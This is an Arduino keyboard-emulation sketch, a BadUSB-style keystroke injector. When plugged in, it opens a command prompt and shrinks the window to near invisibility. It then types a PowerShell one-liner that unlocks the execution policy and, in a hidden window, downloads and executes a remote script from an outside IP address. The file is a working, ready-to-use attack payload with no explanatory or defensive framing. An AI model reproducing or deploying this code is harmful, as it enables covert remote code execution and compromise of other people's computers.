#include "Keyboard.h"

void typeKey(uint8_t key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}
void setup()
{
  Keyboard.begin();
  delay(500);
  delay(1000);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();
  delay(150);
  Keyboard.print("cmd");
  delay(100);
  typeKey(KEY_RETURN);
  delay(100);
  Keyboard.print("color f7 && mode con:cols=15 lines=1");
  delay(100);
  typeKey(KEY_RETURN);
  delay(150);
  Keyboard.print("powershell.exe Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted && powershell.exe -windowstyle hidden -nop -c \"iex(New-Object Net.WebClient).DownloadString('https://120.120.120.120/1.ps1')\"");
  delay(150);
  typeKey(KEY_RETURN);
  Keyboard.end();
}
void loop() {}
